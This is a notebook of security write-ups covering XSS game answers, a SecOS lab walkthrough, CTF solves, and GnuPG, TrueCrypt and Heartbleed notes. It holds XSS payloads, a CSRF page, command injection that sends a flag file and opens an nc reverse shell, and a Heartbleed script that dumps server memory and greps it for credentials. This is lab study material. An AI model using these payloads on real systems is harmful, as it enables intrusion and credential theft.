# XSS game area


Level 1: Hello, world of XSS

https://xss-game.appspot.com/level1/frame
query=<script>alert('xss')</script>

Level 2: Persistence is key

https://xss-game.appspot.com/level2/frame
post-content=<img src='foo' onerror='alert("xss")'>
post-content=<img src='foo' onerror='alert(document.cookie)'>
post-content=<img src='foo' onerror='s=document.createElement("script");s.src="//192.168.1.200/xss.js";document.body.appendChild(s)'>

Level 3: That sinking feeling...

https://xss-game.appspot.com/level3/frame#1
URL=https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>

Level 4: Context matters

https://xss-game.appspot.com/level4/frame
timer=');alert('xss

Level 5: Breaking protocol

https://xss-game.appspot.com/level5/frame
URL=https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')

Level 6: Follow the X

https://xss-game.appspot.com/level6/frame#/static/gadget.js
URL=https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
URL=https://xss-game.appspot.com/level6/frame#Https://192.168.1.1/xss.js
URL=https://xss-game.appspot.com/level6/frame#//192.168.1.1/xss.js

Tools

# ratproxy -w proxy.log -v traces_dir -p 8080 -d xss-game.appspot.com -lextifscgjm
# ratproxy -w proxy.log -v traces_dir -p 8080 -d xss-game.appspot.com -XC

# skipfish -b i -I xss-game.appspot.com -X /css/,/img/ -Z -o report_dir -M -E -U https://xss-game.appspot.com

References

http://tools.ietf.org/html/draft-hoehrmann-javascript-scheme-00
https://www.google.com/about/appsecurity/learning/xss/index.html
https://code.google.com/p/ratproxy/wiki/RatproxyDoc
https://code.google.com/p/skipfish/wiki/SkipfishDoc

# SecOS 1


ht# wget http://download.vulnhub.com/secos/SecOS-1.tar.gz
ht# md5sum SecOS-1.tar.gz 
e8c01ab49b98926a37f79e2ea414cfc5  SecOS-1.tar.gz
ht# tar xvzf SecOS-1.tar.gz
ht# virtualbox
<Run SecOS-1>

Grub solution

GNU GRUB
*Ubuntu
e
linux /vmlinuz-3.13.0-24-generic root=/dev/mapper/SecOS--1--vg-rot ro init=/bin/bash
F10
root@(none):/# cat /root/flag.txt | grep -m 1 flag
The flag for this first (VM) is: MickeyMustNotDie.
root@(none):/# mount -o remout,rw /
root@(none):/# passwd root
<Reboot>

CSRF solution

ht# nmap 192.168.1.1
PORT     STATE SERVICE
22/tcp   open  ssh
8081/tcp open  blackice-icecap
ht# curl --silent http://192.168.1.1:8081
---
            <!--<li><a href="/hint">Wanna help?</a></li>!-->
            <li><a href="/sign-up">Sign up</a></li>
            <li><a href="/login">Login</a></li>
---
ht# curl --silent http://192.168.1.1:8081/hint
---
        <!--
        First: the admin visits the website (really) frequently
        Second: He runs it locally, on 127.0.0.1. 
        Third: CSRF and /(http:\/\/[-\/\.\w:0-9\?&]+)/gi, I think that's enough
        !-->
---
ht# curl --silent --request POST --data 'username=user&password=pass' http://192.168.1.1:8081/sign-up
ht# curl --silent --request POST --cookie-jar uc --cookie uc --data 'username=user&password=pass' http://192.168.1.1:8081/login
ht# curl --silent --cookie-jar uc --cookie uc http://192.168.1.1:8081/users
ht# curl --silent --request POST --cookie-jar uc --cookie uc --data 'to=spiderman&message=http://192.168.1.2:8000/csrf.html' http://192.168.1.1:8081/send-message
ht# cat csrf.html 
<html>
<body>
<form action='http://127.0.0.1:8081/change-password' method='post' name='form'>
<input name='password' value='pass'>
</form>
<script type='text/javascript'>document.form.submit();</script>
</body>
</html>
ht# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.1.1 - - "GET /csrf.html HTTP/1.1" 200 -
ht# curl --silent --request POST --cookie-jar sc --cookie sc --data 'username=spiderman&password=pass' http://192.168.1.1:8081/login
ht# curl --silent --cookie-jar sc --cookie sc http://192.168.1.1:8081/messages | grep Well
                    <td>Well, your password is.. "CrazyPassword!". So, what do you say? </td>
ht# ssh spiderman@192.168.1.1
spiderman@192.168.1.1's password:CrazyPassword!
spiderman@SecOS-1:~$ crontab -e
* * * * * /opt/phantomjs/bin/phantomjs /home/spiderman/vnwa/scripts/admin.js
spiderman@SecOS-1:~$ ps axuf | grep sudo
sudo -u spiderman sh -c /usr/local/bin/node /home/spiderman/vnwa/server.js
sudo -u root sh -c /usr/local/bin/node /home/spiderman/vnwa/internalServer.js
spiderman@SecOS-1:~$ cat /home/spiderman/vnwa/internalServer.js
var fs = require('fs');
var express = require('express');
var http = require('http');
var sys = require('sys')
var exec = require('child_process').exec;
var crypto = require('crypto');

var utils = require('./lib/utils.js');
var model = require('./lib/model.js');

var app = express();
var server = http.createServer(app); 

var logger = function (req, res, next) {
    console.log(req.connection.remoteAddress + " tried to access : " + req.url);
    next(); // Passing the request to the next handler in the stack.
}

// Configuration
app.configure(function () {
    // Session management
    app.use(express.cookieParser());
    app.use(express.session({secret: 'privateKeyForSession'}));
    app.use("/js", express.static(__dirname + '/public/js')); // javascript folder
    app.use("/css", express.static(__dirname + '/public/css')); // javascript folder

    app.set('views', __dirname + '/views'); // views folder
    app.set('view engine', 'ejs'); // view engine for this projet : ejs 

    app.use(express.bodyParser()); // for POST Requests
    app.use(logger); // Here you add your logger to the stack.
    app.use(app.router); // The Express routes handler.
});


app.get('/', function (req, res) {
    res.render('ping.ejs', {
        isConnected: req.session.isConnected,
        isAdmin: req.session.isAdmin
    });
});

// Update password
app.post('/', function (req, res) {
    ip = req.body.ip
    if (ip == "") {
        utils.redirect(req, res, '/ping-status');
    } else {
        // getting the command with req.params.command
        var child;
        // console.log(req.params.command);
        child = exec('ping ' + ip, function (error, stdout, stderr) {
            res.render('ping.ejs', {
                isConnected: req.session.isConnected,
                message: stdout,
                isAdmin: req.session.isAdmin
            });
        });
    }
});

server.listen(9000, '127.0.0.1', function() {
  console.log("Listening on port 9000");
});
spiderman@SecOS-1:~$ curl --silent --request POST --data 'ip=-c 1 127.0.0.1; nc 192.168.1.2 1234 < /root/flag.txt' http://127.0.0.1:9000
ht# ncat -l 192.168.1.2 1234 | grep -m 1 flag
The flag for this first (VM) is: MickeyMustNotDie.
spiderman@SecOS-1:~$ function encode { echo -n "$1" | xxd -p | tr -d '\n' | sed 's/\(..\)/%\1/g'; }
spiderman@SecOS-1:~$ encoded=`encode '-c 1 127.0.0.1; if [ ! -p /tmp/f ]; then mkfifo /tmp/f; fi ; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.2 1234 > /tmp/f'`
spiderman@SecOS-1:~$ curl --silent --request POST --data "ip=$encoded" http://127.0.0.1:9000
ht# ncat -l 192.168.1.2 1234
# hostname
SecOS-1
# whoami
root

# PicoCTF 2k13 - moreevil


# gdb -q -n -x moreevil.py
Please enter your password: 1  
 [0x401f2f] cmp ebx, eax                                                        [0x1] < [0x13]
Wrong!

# gdb -q -n -x moreevil.py
Please enter your password: 1234567890123456789 
[0x4020df] xor ebx, r10d                                                        ['1'] ^ ['q'] = '@'
 [0x4020df] xor ebx, r10d                                                       ['2'] ^ ['q'] = 'C'
  [0x4020df] xor ebx, r10d                                                      ['3'] ^ ['q'] = 'B'
   [0x4020df] xor ebx, r10d                                                     ['4'] ^ ['q'] = 'E'
    [0x4020df] xor ebx, r10d                                                    ['5'] ^ ['q'] = 'D'
     [0x4020df] xor ebx, r10d                                                   ['6'] ^ ['q'] = 'G'
      [0x4020df] xor ebx, r10d                                                  ['7'] ^ ['q'] = 'F'
       [0x4020df] xor ebx, r10d                                                 ['8'] ^ ['q'] = 'I'
        [0x4020df] xor ebx, r10d                                                ['9'] ^ ['q'] = 'H'
         [0x4020df] xor ebx, r10d                                               ['0'] ^ ['q'] = 'A'
          [0x4020df] xor ebx, r10d                                              ['1'] ^ ['q'] = '@'
           [0x4020df] xor ebx, r10d                                             ['2'] ^ ['q'] = 'C'
            [0x4020df] xor ebx, r10d                                            ['3'] ^ ['q'] = 'B'
             [0x4020df] xor ebx, r10d                                           ['4'] ^ ['q'] = 'E'
              [0x4020df] xor ebx, r10d                                          ['5'] ^ ['q'] = 'D'
               [0x4020df] xor ebx, r10d                                         ['6'] ^ ['q'] = 'G'
                [0x4020df] xor ebx, r10d                                        ['7'] ^ ['q'] = 'F'
                 [0x4020df] xor ebx, r10d                                       ['8'] ^ ['q'] = 'I'
                  [0x4020df] xor ebx, r10d                                      ['9'] ^ ['q'] = 'H'
                   [0x401fd6] cmp r11d, ebx                                     [0x13] == [0x13]
[0x4021e8] mov rbx, rax                                                         rbx = [0x6030c8]
[0x4021eb] mov rbx, QWORD PTR [rbx]                                             rbx = [0x19]
[0x4021ee] cmp r11d, ebx                                                        ['@'] > [0x19]
Wrong!
# gdb moreevil
(gdb) set environment LD_PRELOAD=lib/hook64.so
(gdb) break *0x4021ee
(gdb) run
Please enter your password: 1234567890123456789
(gdb) x/152xb 0x6030c8
0x6030c8: 0x19 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x6030d0: 0x1e 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x6030d8: 0x06 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x6030e0: 0x51 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x6030e8: 0x1d 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x6030f0: 0x1e 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x6030f8: 0x06 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x603100: 0x51 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x603108: 0x12 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x603110: 0x10 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x603118: 0x1f 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x603120: 0x51 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x603128: 0x08 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x603130: 0x1e 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x603138: 0x04 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x603140: 0x51 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x603148: 0x16 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x603150: 0x1e 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x603158: 0x4e 0x00 0x00 0x00 0x00 0x00 0x00 0x00

# ipython
In [1]: key = [0x19, 0x1e, 0x06, 0x51, 0x1d, 0x1e, 0x06, 0x51, 0x12, 0x10, 0x1f, 0x51, 0x08, 0x1e, 0x04, 0x51, 0x16, 0x1e, 0x4e]
In [2]: password = ''
In [3]: for byte in key:
            password += chr(byte ^ ord('q'))

In [4]: password
Out[4]: 'how low can you go?'

# GnuPG: The GNU Privacy Guard


Generating a new keypair

# gpg --gen-key

List the keys

# gpg --list-keys
# key=`gpg --list-keys | grep ^pub | tr '/' ' ' | awk '{print $3}'`
# email=`gpg --list-keys | grep uid | sed 's/.\+<\(.\+@.\+\..\+\)>/\1/'`

Generating a revocation certificate

# gpg --output revoke.asc --gen-revoke $key

Exporting a public key

# gpg --armor --output $email.gpg --export $key
# gpg --fingerprint $key

Importing a public key

# gpg --import $email.gpg
# gpg --edit-key $key
> fpr
> sign
> check

Making signatures

# gpg --sign original.file # 1
# gpg --clearsign original.file # 2
# gpg --detach-sig original.file # 3

Verifying signatures

# gpg --verify signed.file # 1, 2, 3
# gpg --decrypt signed.file # 1, 2

Encrypting documents

# gpg --output encrypted.file --encrypt --recipient $email original.file
# gpg --output encrypted.file --symmetric original.file # shared secret

Decrypting documents

# gpg --output original.file --decrypt encrypted.file

Delete a key from your public keyring

# gpg --delete-keys $key

References

https://www.gnupg.org/gph/en/manual.html

# 0x3004 CTF - Prison Break s02


# python
>>> list(vars())
['__builtins__', '__name__', '__doc__', '__package__']
>>> [newvar for newvar in list(vars())]
['__builtins__', '__name__', '__doc__', '__package__']
>>> [list(vars()) for newvar in [0]][0]
['__builtins__', '__name__', 'newvar', '__doc__', '__package__']

# cat pyjail.py
from sys import modules
modules.clear()
del modules

__builtins__.dir = None
eval = None
input = None
execfile = None

LEN_PASS = None
print [list(vars()) for password in [0]]
print [list(vars()).index('password') for password in [0]]

# python pyjail.py
[['LEN_PASS', '__builtins__', '__file__', 'execfile', '__package__', 'eval', 'input', '__name__', 'password', '__doc__']]
[8]

# cat prison_break_s02.sh
#!/bin/bash

function encode {
    echo -n "$1" | xxd -p | tr -d '\n' | sed 's/\(..\)/%\1/g'
}

escape="$1"
password=`encode $escape`

curl --silent --request POST --data code=$password 'http://challenges.wargame.vn:50006/go'

# ./prison_break_s02.sh "[max(open(list(vars())[8]))for(password)in[0]][0]"
<html><title>Prison Break s02</title><style>body{background:#000;}</style><body>

    from sys import modules
    modules.clear()
    del modules

    __builtins__.dir = None
    eval = None
    input = None
    execfile = None

    LEN_PASS = len(open('./password','r').read()) # Length of Password
    
    I_N_P_U_T = ( <strong style='color:Green;'>[max(open(list(vars())[8]))for(password)in[0]][0]</strong> ) # only a-z0-9[]() and length of code must be <= 50
    
    P_A_S_S_W_O_R_D = open('./password','r').read()

    assert LEN_PASS >= 1
    assert LEN_PASS == len(I_N_P_U_T)
    for i in range(LEN_PASS):
     if I_N_P_U_T[i] != P_A_S_S_W_O_R_D[i]:
      from sys import exit
      exit()

    # FLAGGGGGGGGGGGGGGGGGGGGGGGG
    print 'Here is your flag:',open('./flag','r').read()
    -----------------------------------------------------
    
    <strong style='color:White;'>Here is your flag: 0x3004{final_stage_prison_break_1337}

</strong>
</pre></html>

References

http://blog.natusvincere.org/2014/05/03/0x3004-ctf-prison-break-s02-pwn300/

# Encrypt all your data storage device


Download

# mkdir truecrypt && cd $_
# wget --no-check-certificate https://www.truecrypt.org/download/TrueCrypt-Foundation-Public-Key.asc
# wget --no-check-certificate https://www.truecrypt.org/download/truecrypt-7.1a-linux-console-x64.tar.gz.sig
# wget --no-check-certificate https://www.truecrypt.org/download/truecrypt-7.1a-linux-console-x64.tar.gz

Verification

# gpg --import TrueCrypt-Foundation-Public-Key.asc
# gpg --verify truecrypt-7.1a-linux-console-x64.tar.gz.sig truecrypt-7.1a-linux-console-x64.tar.gz

Installation

# tar xvzf truecrypt-7.1a-linux-console-x64.tar.gz
# ./truecrypt-7.1a-setup-console-x64
To uninstall TrueCrypt, please run 'truecrypt-uninstall.sh'.

Installing package...
usr/bin/truecrypt
usr/bin/truecrypt-uninstall.sh
usr/share/truecrypt/doc/License.txt
usr/share/truecrypt/doc/TrueCrypt User Guide.pdf
# cd ..
# rm -rf truecrypt

Encrypted volume creation

# dd if=/dev/urandom of=$device # Also use shred
# device='/dev/sdb' # Choose yours
# truecrypt --encryption=AES -k '' --filesystem=ext4 --hash=SHA-512 --random-source=/dev/urandom --volume-type=normal --quick --create $device
# truecrypt -k '' --filesystem=none --protect-hidden=no --slot=1 $device
# mkfs.ext4 `truecrypt -l | awk '{print $3}'`
# truecrypt --dismount $device

Mount and dismount

# mount_point='/mnt' # Choose yours
# truecrypt -k '' --protect-hidden=no --mount $device $mount_point
# truecrypt --dismount $device

# Heartbleed


Affected OpenSSL versions

The affected versions of OpenSSL are OpenSSL 1.0.1 through 1.0.1f (inclusive).
Later versions (1.0.1g and ulterior) and previous versions (1.0.0 branch and older) are not vulnerable.
Installations of the affected versions are vulnerable unless OpenSSL was compiled with OPENSSL_NO_HEARTBEATS.

Scan and exploit

# ./hbse 127.0.0.1 # Interactive mode.
# ./hbse --scan 127.0.0.1 # No interactive mode. Scan only.
# ./hbse --exploit 127.0.0.1 # No interactive mode. Scan and exploit.

# cat hbse 
#!/bin/bash

### TCP ####

# 443  (HTTPS - HTTP over SSL)
# 465  (SMTPS - SMTP over SSL)
# 563  (NNTPS - NNTP over TLS/SSL)
# 636  (LDAPS - LDAP over TLS/SSL)
# 989  (FTPS Data - FTP Data over TLS/SSL)
# 990  (FTPS Control - FTP Control over TLS/SSL)
# 992  (Telnet over TLS/SSL)
# 993  (IMAPS - IMAP over SSL)
# 995  (POP3S - POP3 over SSL)
# 1194 (OpenVPN)
# 2484 (Oracle Database listening for SSL client)
# 5061 (SIP over TLS)
# 8443 (Apache Tomcat SSL)

### UDP ###

# 563  (NNTPS - NNTP over TLS/SSL)
# 636  (LDAPS - LDAP over TLS/SSL)
# 4433 (OpenSSL)

if [ $# -eq 1 ]; then
    ip="$1"
elif [ $# -eq 2 ]; then
    se="$1"
    ip="$2"
else
    exit
fi
nports="T:443,465,563,636,989,990,992,993,995,1194,2484,5061,8443,U:563,636,4433"

function print() {
    text="$1"
    color="$2"
    if [ "$color" == "gray" ]; then
        header="\e[38;5;250m"
    elif [ "$color" == "red" ]; then
        header="\e[91m"
    elif [ "$color" == "green" ]; then
        header="\e[92m"
    elif [ "$color" == "yellow" ]; then
        header="\e[93m"
    fi
    tail="\e[0m"
    echo -en $header$text$tail
}

print "Checking if $ip is vulnerable on port 443... " "gray"
vulnerable="`nmap -p T:443 -script ssl-heartbleed $ip | grep VULNERABLE`"

if [ "$vulnerable" != "" ]; then
    print "Yes\n" "green"
    print "Checking if it is vulnerable on other ports... " "gray"
    vports="`nmap -p $nports -script ssl-heartbleed $ip | grep -B 2 VULNERABLE: | grep open | awk -F'/' '{print $1}'`"
    n="`echo "$ports" | wc -l`"
    if [ "$n" == 1 ]; then 
        print "No\n" "red"
        w1="port"
        w2="it"
        w3="file"
    else
        print "Yes\n" "green"
        w1="ports"
        w2="them"
        w3="files"
    fi
    print "Vulnerable $w1:\n" "gray"
    print "$vports\n" "green"
    if [ "$se" == "--scan" ]; then exit
    elif [ "$se" == "--exploit" ]; then
        answer="Y"
    else
        print "Do you want to exploit $w2? [Yn] " "gray"
        read answer
    fi
    if [ "$answer" = "Y" ]; then
        print "Exploit: dumping 64KB on vulnerable $w1...\n" "gray"
        exec 3<<< "$vports"
        while read port <&3; do
            print "+ Port [$port]\n" "gray"
            ofile="$ip.$port"
            if [ -f $ofile ]; then rm -f $ofile; fi
            if [ "$port" == "465" ]; then
                precmd='-c 0'
            elif [ "$port" == "993" ]; then
                precmd='-c 2'
            elif [ "$port" == "995" ]; then
                precmd='-c 1'
            else
                precmd=''
            fi
            ./heartbleed -s $ip -p $port -f $ofile $precmd -t 1 > /dev/null 2>&1
            if [ -f $ofile ]; then
                r="`strings $ofile | grep -i -e user -e pass -e login -e auth -e cookie -e basic`"
                print "$r\n" "green"
                if [ "$se" != "--exploit" ]; then
                    print "Do you want to less the hexdump file? [Yn] " "gray"
                    read answer
                    if [ "$answer" = "Y" ]; then
                        hexdump -C $ofile | less
                    fi
                fi
            else
                print "Error: heartbleed did not work on port $port...\n" "yellow"
            fi
        done
        if [ "$se" != "--exploit" ]; then
            print "Do you want to delete the hexdump $w3? [Yn] " "gray"
            read answer
            if [ "$answer" = "Y" ]; then
                rm -f $ip.*
            fi
        fi
    fi
else
    print "No\n" "red"
fi

Requirements

# apt-get install nmap
# wget --no-check-certificate https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse
# mv ssl-heartbleed.nse /usr/share/nmap/scripts/.
# wget http://nmap.org/svn/nselib/tls.lua
# mv tls.lua /usr/share/nmap/nselib/.
# wget -O heartbleed.c http://www.exploit-db.com/download/32791
# gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto